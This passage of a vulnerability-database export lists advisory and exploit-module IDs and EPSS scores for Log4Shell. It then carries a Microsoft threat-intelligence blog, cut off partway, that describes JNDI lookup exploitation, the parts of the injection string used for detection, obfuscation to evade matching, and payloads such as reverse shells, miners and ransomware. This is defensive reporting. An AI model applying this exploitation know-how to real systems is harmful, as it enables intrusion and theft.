"F8F03C35A3C8AEA5027E6C01D991D7E1C3A4A0C9EAE0D875ACF760D1D56B8B9C", "F9CD245944BE763583F94B01BC23C08D6F82CA4989F000C1D0842D4005C4EF11", "FA8CCED2D5B77B978F428FA2F61CD879A13EF9DAC53A5435AC48BEE003AC2363", "FB294BF49176D6C142EF1CFE519D56E0B6967174C95D88BDD800F026AD0FBE3B", "FBA658AB7258D6E577137D42B1A2D234254671E3792A2242E92F22B44483BD23", "FC9172D16F62D7749E6C1369AB9D86ABC42163C780B457F765109BE80ACAD9CF", "FCA762BB9E14A08E1A746C9884B2B094D081A955F4AED9FE69DA524978C45CE9", "FD7B4551E68C6A5B21AD8C3E07FF7CB6ED5402B6F6CD6D419A3FCC60FFB43FC4", "FD90B8CB0F60381B89DB489D4F28883B2B08D5BF67796B29DF21E510CCF7594F", "FEC06635C46DD9EB6B2F50E66A9B098564986FB86BF7FDE8DBF9F7E295CE3162", "FFB1DE47049D302B3C804FCFC90E8D4C1A715F59A9B241F24946D4A7A6598C10", "FFB480E3AA8E74E184658371B22D113F0FB890C232EB9EE9B8A8294BE098DDAE", "FFF0238333AAC9C302B602B36ADA76C6BDDE2A493106B114D0A3A45C8740777D"]}, {"type": "ics", "idList": ["ICSA-21-357-02", "ICSA-22-034-01"]}, {"type": "impervablog", 
"idList": ["IMPERVABLOG:357497C932E21C66FB08D2C9B8EE9CA2", "IMPERVABLOG:5E03360E0443A626205E9BCF969114F6", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:B4C9A56D0F82346F616E74B1CFB10A5D", "IMPERVABLOG:B69DFFED5C2E2C9D2F9917E3F4915200", "IMPERVABLOG:BB63986B2DE2CCB2C65DD3747791097F", "IMPERVABLOG:BE9CCB7ADF74E2AEFC999FEE704CDE71", "IMPERVABLOG:BEE8EB9D446D0AF62464EE59DFA0CE0E", "IMPERVABLOG:DB0BBA5A6E2E523FAA7F7A73C45FEA96"]}, {"type": "intel", "idList": ["INTEL:INTEL-SA-00646"]}, {"type": "kaspersky", "idList": ["KLA12224", "KLA12390", "KLA12391", "KLA12392", "KLA12393", "KLA12394", "KLA12395", "KLA12396", "KLA12442"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634", "KITPLOIT:134021490040098714", "KITPLOIT:144331229809700743", "KITPLOIT:1680589374755422772", "KITPLOIT:3188944951765917430", "KITPLOIT:3773942873037113539", "KITPLOIT:4125185526326677098", "KITPLOIT:4333067961180534072", "KITPLOIT:4462385753504235463", "KITPLOIT:4654779182065061303", "KITPLOIT:5104415481503400470", "KITPLOIT:522409803487164759", "KITPLOIT:5734436811250397170", "KITPLOIT:5789499291738758939", "KITPLOIT:6422486000446318290", "KITPLOIT:6759391622067035795", "KITPLOIT:7847586937102427883", "KITPLOIT:7976092996345827446", "KITPLOIT:8031680161397698025", "KITPLOIT:8148701901300660800", "KITPLOIT:8266451932034361580", "KITPLOIT:8945091038325456871"]}, {"type": "krebs", "idList": ["KREBS:831FD0B726B800B2995A68BA50BD8BE3"]}, {"type": "mageia", "idList": ["MGASA-2021-0556", "MGASA-2021-0566", "MGASA-2021-0572", "MGASA-2022-0002"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:1B8D17909172F80C0F82CB21FDFC33B2", "MALWAREBYTES:39A05D4A4EC81966F7A1721DFACB3470", "MALWAREBYTES:42218FB85F05643E0B2C2C7D259EFEB5", "MALWAREBYTES:4CB01833826116B2823401DFB69A5431", "MALWAREBYTES:6A4862332586F98DA4761BE2B684752F", "MALWAREBYTES:A325F8FB1D527BD3C6C1C3A187840632", "MALWAREBYTES:B0F2474F776241731FE08EA7972E6239", 
"MALWAREBYTES:B830332817B5D5BEE99EF296E8EC7E2A", "MALWAREBYTES:B8C767042833344389F6158273089954"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY-SCANNER-HTTP-LOG4SHELL_SCANNER-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-LOG4SHELL_HEADER_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-VMWARE_VCENTER_LOG4SHELL-", "MSF:EXPLOIT-WINDOWS-HTTP-EXCHANGE_PROXYSHELL_RCE-"]}, {"type": "mmpc", "idList": ["MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "mscve", "idList": ["MS:CVE-2021-31196", "MS:CVE-2021-31206", "MS:CVE-2021-34473", "MS:CVE-2021-44228"]}, {"type": "mskb", "idList": ["KB5001779"]}, {"type": "msrc", "idList": ["MSRC:543F3A129A47F4B14FB170389908717B"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:BB2F5840056D55375C4A19D2FF07C695"]}, {"type": "nessus", "idList": ["AL2_ALAS-2021-001.NASL", "AL2_ALAS-2021-1730.NASL", "AL2_ALAS-2021-1731.NASL", "AL2_ALAS-2021-1732.NASL", "AL2_ALAS-2021-1733.NASL", "AL2_ALAS-2022-1773.NASL", "AL2_ALAS-2022-1806.NASL", "AL2_ALASCORRETTO8-2021-001.NASL", "AL2_ALASJAVA-OPENJDK11-2021-001.NASL", "ALA_ALAS-2021-1553.NASL", "ALA_ALAS-2021-1554.NASL", "ALA_ALAS-2022-1562.NASL", "ALA_ALAS-2022-1580.NASL", "ALA_ALAS-2022-1601.NASL", "ALMA_LINUX_ALSA-2022-0290.NASL", "APACHE_APEREO_CAS_LOG4SHELL.NBIN", "APACHE_DRUID_LOG4SHELL.NBIN", "APACHE_JSPWIKI_LOG4SHELL.NBIN", "APACHE_LOG4J_2_15_0.NASL", "APACHE_LOG4J_2_16_0.NASL", "APACHE_LOG4J_2_16_0_MAC.NASL", "APACHE_LOG4J_2_17_0.NASL", "APACHE_LOG4J_2_17_0_MAC.NASL", "APACHE_LOG4J_2_17_1.NASL", "APACHE_LOG4J_JDNI_LDAP_GENERIC.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_HTTP_HEADERS.NBIN", "APACHE_LOG4J_JDNI_LDAP_GENERIC_TELNET.NBIN", "APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN", "APACHE_LOG4SHELL_DNS.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", 
"APACHE_LOG4SHELL_MSRPC.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SNMP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_LOG4SHELL_UPNP.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-CUIC.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-ISE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-SDWAN-VMANAGE.NASL", "CISCO-SA-APACHE-LOG4J-QRUKNEBD-UCS-DIRECTOR.NASL", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DLA-2852.NASL", "DEBIAN_DLA-2870.NASL", "DEBIAN_DLA-2905.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "DEBIAN_DSA-5024.NASL", "EULEROS_SA-2022-1276.NASL", "EXCHANGE_PROXYSHELL.NBIN", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "FREEBSD_PKG_93A1C9A75BEF11ECA47A001517A2E1A4.NASL", "FREEBSD_PKG_B0F49CB9673611EC9EEA589CFC007716.NASL", "FREEBSD_PKG_D1BE3D73673711EC9EEA589CFC007716.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_NTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "LOG4J_VULNERABLE_ECOSYSTEM_LAUNCHER.NASL", "MACOS_SPLUNK_824.NASL", "MOBILEIRON_LOG4SHELL.NBIN", "MYSQL_ENTERPRISE_MONITOR_8_0_30.NASL", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-1605.NASL", "OPENSUSE-2021-1612.NASL", "OPENSUSE-2021-1613.NASL", "OPENSUSE-2021-1631.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4111.NASL", "OPENSUSE-2021-4112.NASL", "OPENSUSE-2021-4118.NASL", "OPENSUSE-2021-4208.NASL", "OPENSUSE-2022-0002-1.NASL", "OPENSUSE-2022-0038-1.NASL", 
"APACHE_LOG4J_JNDI_LDAP_GENERIC_RAW.NBIN", "APACHE_LOG4J_WIN_2_15_0.NASL", "APACHE_LOG4SHELL_CVE-2021-45056_DIRECT_CHECK.NBIN", "APACHE_LOG4SHELL_IMAP.NBIN", "APACHE_LOG4SHELL_NETBIOS.NBIN", "APACHE_LOG4SHELL_POP3.NBIN", "APACHE_LOG4SHELL_SMTP.NBIN", "APACHE_LOG4SHELL_SSH.NBIN", "APACHE_OFBIZ_LOG4SHELL.NBIN", "APACHE_SOLR_LOG4SHELL.NBIN", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "DEBIAN_DLA-2842.NASL", "DEBIAN_DSA-5020.NASL", "DEBIAN_DSA-5022.NASL", "DEBIAN_DSA-5024.NASL", "FREEBSD_PKG_1EA05BB85D7411ECBB1E001517A2E1A4.NASL", "FREEBSD_PKG_3FADD7E4F8FB45A0A2188FD6423C338F.NASL", "FREEBSD_PKG_4B1AC5A35BD411EC8602589CFC007716.NASL", "FREEBSD_PKG_515DF85A5CD711ECA16D001517A2E1A4.NASL", "FREEBSD_PKG_650734B2766541709A0AEECED5E10A5E.NASL", "LOG4J_LOG4SHELL_FTP.NBIN", "LOG4J_LOG4SHELL_PPTP.NBIN", "LOG4J_LOG4SHELL_RPCBIND.NBIN", "LOG4J_LOG4SHELL_SIP_INVITE.NBIN", "LOG4J_LOG4SHELL_SMB.NBIN", "LOG4J_LOG4SHELL_WWW.NBIN", "OPENSUSE-2021-1577.NASL", "OPENSUSE-2021-1586.NASL", "OPENSUSE-2021-1601.NASL", "OPENSUSE-2021-3999.NASL", "OPENSUSE-2021-4094.NASL", "OPENSUSE-2021-4107.NASL", "OPENSUSE-2021-4109.NASL", "OPENSUSE-2021-4118.NASL", "SMB_NT_MS21_APR_EXCHANGE.NASL", "UBUNTU_USN-5192-1.NASL", "UBUNTU_USN-5192-2.NASL", "UBUNTU_USN-5197-1.NASL", "UBUNTU_USN-5203-1.NASL", "VMWARE_HORIZON_LOG4SHELL.NBIN", "VMWARE_VCENTER_LOG4SHELL.NBIN", "WEB_APPLICATION_SCANNING_112944", "WEB_APPLICATION_SCANNING_112961", "WEB_APPLICATION_SCANNING_112962", "WEB_APPLICATION_SCANNING_112963", "WEB_APPLICATION_SCANNING_112964", "WEB_APPLICATION_SCANNING_113075"]}, {"type": "oracle", "idList": ["ORACLE:CPUJAN2022"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:163895", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165261", "PACKETSTORM:165270", "PACKETSTORM:165642"]}, {"type": "paloalto", "idList": ["PA-CVE-2021-44228"]}, {"type": "qt", "idList": ["QT:7EFAEDCED59EA2EE3AB98A0A484C5825"]}, {"type": "qualysblog", "idList": 
["QUALYSBLOG:13C1A00A7D0A7B1BB16D0AB5B1E9B51A", "QUALYSBLOG:3FADA4B80DBBF178154C0729CFC1358F", "QUALYSBLOG:42335884011D582222F08AEF81D70B94", "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "QUALYSBLOG:68BBBF644900DA0A883AABB0E4E3F28B", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:C3C14B989683A02C2C9A98CE918FBC3C"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:078D5EE222682A75AE1A1A3A3684E38D", "RAPID7BLOG:18D49792276E208F17E7D64BCE2FDEF6", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:4CDB288231FA4BF52C0067D9D4FEABBF", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:6EADCD983283E3D546EF2907978E95F1", "RAPID7BLOG:7767347A5784FF1C4901601A1A21D2C8", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:7F1312E79E0925118565C90443170051", "RAPID7BLOG:9CB105938BDE92F573A2DE68BC20CF46", "RAPID7BLOG:9F3C0081D4135E83F44053063F0E78EE", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:B6DE24165AA9AA83EDA117170EDDAD44", "RAPID7BLOG:CB62092B4C7E70876CF276BA04DD7597", "RAPID7BLOG:D1E1A150733F5AFC2C704DB26E7EAB30", "RAPID7BLOG:E3D08ECAA9A93569D5544F4D6AAEEB74", "RAPID7BLOG:E43819A7DE1DD0F60E63E67A27B9301B", "RAPID7BLOG:F37BD0C67170721734A26D15E6D99B3E", "RAPID7BLOG:F9B4F18ABE4C32CD54C3878DD17A8630"]}, {"type": "redhat", "idList": ["RHSA-2022:0082", "RHSA-2022:0223"]}, {"type": "redhatcve", "idList": ["RH:CVE-2021-4104", "RH:CVE-2021-4125", "RH:CVE-2021-44228", "RH:CVE-2021-45046", "RH:CVE-2021-45105"]}, {"type": "securelist", "idList": ["SECURELIST:7A375F44156FACA25A0B3990F2CD73C1", "SECURELIST:9CC623A02615C07A9CEABD0C58DE7931", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:1577-1", "OPENSUSE-SU-2021:1586-1", "OPENSUSE-SU-2021:1601-1", "OPENSUSE-SU-2021:1605-1", "OPENSUSE-SU-2021:3999-1", "OPENSUSE-SU-2021:4094-1", 
"OPENSUSE-SU-2021:4107-1", "OPENSUSE-SU-2021:4109-1", "OPENSUSE-SU-2021:4118-1"]}, {"type": "symantec", "idList": ["SMNTC-19793"]}, {"type": "thn", "idList": ["THN:0468E8E1C5525F2A9F2ED37592AE0910", "THN:080602C4CECD29DACCA496697978CAD0", "THN:15D4F25153F9911661383B3B2153469D", "THN:16B3DB5DFBB6E86B79815E0E44D48021", "THN:1E1BEA193C556F91F471CD5B785B85B3", "THN:1E4DA950F02E02DFD1649B39A06A82C6", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:317555CB8AA3A9E1AE70E218E44CC2EE", "THN:36D12A8768EE450B36B1C8D186F023E5", "THN:3E7257F45C71DCBDD0C320E7AAF383CA", "THN:4BC5D1A9ACDADBABF85BF51166D61386", "THN:5BAE3325983F971D1108722C454FF9AB", "THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:5CB7AEBFFE369D293598A4FDBFDFCEE3", "THN:5D8CEBFFF41D128545CD83F6F45D68F4", "THN:602D65D576B090BAC4B0C96998F8F922", "THN:656628F2B0FBE9789F4434FCAFFBCFE1", "THN:668DE2C9CFD709125451AF8F3FE12E6C", "THN:683B509BDB84EA9FEBCF0B1EE68D0C08", "THN:686DDFA07B415C41BA7AB9B8970557EF", "THN:6E47D45D685F44083BE0A6763799D209", "THN:76D7572EDBE770410D6F0518DAD8B0AD", "THN:833B2B9623F1C64D20868B947E8BE4E0", "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "THN:88184AFF85BF7EC0848D95E6BB0BEDB4", "THN:933FE23273AB5250B949633A337D44E1", "THN:9C12FFDB69779929861327CF77B13726", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A12549603E494D035DF4BABEC04EBD5D", "THN:AFF2BD38CB9578D0F4CA96A145933627", "THN:C221700D7BBC27110090E137F7288FA3", "THN:C4188C7A44467E425407D33067C14094", "THN:DC2D78987D283D806FF145511EF10596", "THN:E006E516DD134F047ED991AC23F057A4", "THN:F076354512CA34C263F222F3D62FCB1E", "THN:F8D94BE25D6D25E0F52FB4433E619721", "THN:FA40708E1565483D14F9A31FC019FCE1", "THN:FADB0A82C9DCE0870E617D4A8E5A34A6"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:065F7608AC06475E765018E97F14998D", "THREATPOST:10D0F1DDDD6C211DA3CE6395900B7C54", "THREATPOST:187B01687ED5D3975CD6E42E84DD9B13", "THREATPOST:27C5AA551B5793DEA8848FB76DE52B32", "THREATPOST:34D98758A035C36FED68DDD940415845", 
"THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "THREATPOST:3A5F59D56E40560C393A3F69A362A31B", "THREATPOST:46837E7270195429E1D891848E911254", "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "THREATPOST:5B9D3D8DB4BFEDE846215C1877B275ED", "THREATPOST:5CCE0C2607242B16B2880B331167526C", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:76A5549135F9D578FFC2C8FACC135193", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:AFD74E86954C5A08B3F246887333BDF3", "THREATPOST:B318814572E066732E6C32CC147D95E2", "THREATPOST:D098942E4435832E619282E1B92C9E0F"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:C927C873A9E9A7AF6B74D64EFAFA6B02"]}, {"type": "ubuntu", "idList": ["USN-5192-1", "USN-5192-2", "USN-5197-1", "USN-5203-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2021-44228", "UB:CVE-2021-45046", "UB:CVE-2021-45105"]}, {"type": "vmware", "idList": ["VMSA-2021-0028.9"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:060FBB90648BCDE11554492408AE89C8", "WALLARMLAB:2AAA5E62EED6807B93FB40361B4927CB", "WALLARMLAB:90D3FFE69FF928689D36310EF8B1C4F3", "WALLARMLAB:E86F01AF50087BEB03AAB46947CDE884"]}, {"type": "zdi", "idList": ["ZDI-21-1541", "ZDI-21-821"]}, {"type": "zdt", "idList": ["1337DAY-ID-36667", "1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37135", "1337DAY-ID-37136", "1337DAY-ID-37257"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-26084", "epss": "0.974760000", "percentile": "0.999340000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34473", "epss": "0.974090000", "percentile": "0.998460000", "modified": "2023-03-17"}, {"cve": "CVE-2021-35247", "epss": "0.003290000", "percentile": "0.663670000", "modified": 
"2023-03-18"}, {"cve": "CVE-2021-44228", "epss": "0.975780000", "percentile": "0.999980000", "modified": "2023-03-18"}, {"cve": "CVE-2021-44428", "epss": "0.009380000", "percentile": "0.806950000", "modified": "2023-03-18"}, {"cve": "CVE-2021-44832", "epss": "0.071980000", "percentile": "0.929430000", "modified": "2023-03-18"}, {"cve": "CVE-2021-45046", "epss": "0.974160000", "percentile": "0.998510000", "modified": "2023-03-18"}, {"cve": "CVE-2021-45105", "epss": "0.972620000", "percentile": "0.996990000", "modified": "2023-03-18"}], "vulnersScore": 0.2}, "_state": {"dependencies": 1659988328, "score": 1684013037, "epss": 1679165106}, "_internal": {"score_hash": "c39d08e20274d900cd3ace0fc79f4d96"}}
{"mssecure": [{"lastseen": "2022-01-19T21:27:16", "description": "**_January 10, 2022 recap \u2013_**_ The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers\u2019 software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may not readily know how widespread the issue is in their environment. Customers are encouraged to utilize scripts and scanning tools to assess their risk and impact. Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities._\n\n_In January, we started seeing attackers taking advantage of the vulnerabilities in internet-facing systems, eventually deploying ransomware._ _We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks. Organizations may not realize their environments may already be compromised. Microsoft recommends customers to do additional review of devices where vulnerable installations are discovered. At this juncture, customers should assume broad availability of exploit code and scanning capabilities to be a real and present danger to their environments. 
Due to the many software and services that are impacted and given the pace of updates, this is expected to have a long tail for remediation, requiring ongoing, sustainable vigilance._\n\n_**January 19, 2022 update** - We added new information about an unrelated vulnerability we discovered while investigating Log4j attacks._\n\nThe remote code execution (RCE) vulnerabilities in Apache Log4j 2 referred to as \u201cLog4Shell\u201d ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), [CVE-2021-44832](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-44832>)) has presented a new attack vector and gained broad attention due to its severity and potential for widespread exploitation. The majority of attacks we have observed so far have been mainly mass-scanning, coin mining, establishing remote shells, and red-team activity, but it\u2019s highly likely that attackers will continue adding exploits for these vulnerabilities to their toolkits.\n\nWith nation-state actors testing and implementing the exploit and known ransomware-associated access brokers using it, we highly recommend applying security patches and updating affected products and services as soon as possible. Refer to the [Microsoft Security Response Center blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>) for technical information about the vulnerabilities and mitigation recommendations.\n\nMeanwhile, defenders need to be diligent in detecting, hunting for, and investigating related threats. This blog reports our observations and analysis of attacks that take advantage of the Log4j 2 vulnerabilities. It also provides our recommendations for using Microsoft security solutions to (1) find and remediate vulnerable services and systems and (2) detect, investigate, and respond to attacks.\n\nThis blog covers the following topics:\n\n 1. 
**Attack vectors and observed activity**\n 2. **Finding and remediating vulnerable apps and systems**\n * Threat and vulnerability management\n * Discovering affected components, software, and devices via a unified Log4j dashboard\n * Applying mitigation directly in the Microsoft 365 Defender portal\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for servers\n * Microsoft Defender for Containers\n * Microsoft Sentinel queries\n * RiskIQ EASM and Threat Intelligence\n 3. **Detecting and responding to exploitation attempts and other related attacker activity**\n * Microsoft 365 Defender\n * Microsoft Defender Antivirus\n * Microsoft Defender for Endpoint\n * Microsoft Defender for Cloud Apps\n * Microsoft Defender for Office 365\n * Microsoft 365 Defender advanced hunting\n * Microsoft Defender for Cloud\n * Microsoft Defender for IoT\n * Microsoft Sentinel\n * Microsoft Sentinel queries\n * Azure Firewall Premium\n * Azure Web Application Firewall (WAF)\n 4. **Indicators of compromise (IoCs)**\n\n## Attack vectors and observed activity\n\nMicrosoft\u2019s unified threat intelligence team, comprising the Microsoft Threat Intelligence Center (MSTIC), Microsoft 365 Defender Threat Intelligence Team, RiskIQ, and the Microsoft Detection and Response Team (DART), among others, have been tracking threats taking advantage of the remote code execution (RCE) vulnerabilities in [Apache Log4j 2](<https://logging.apache.org/log4j/2.x/>) referred to as \u201cLog4Shell\u201d.\n\nThe bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. 
An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. 
Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. 
Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. 
We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. 
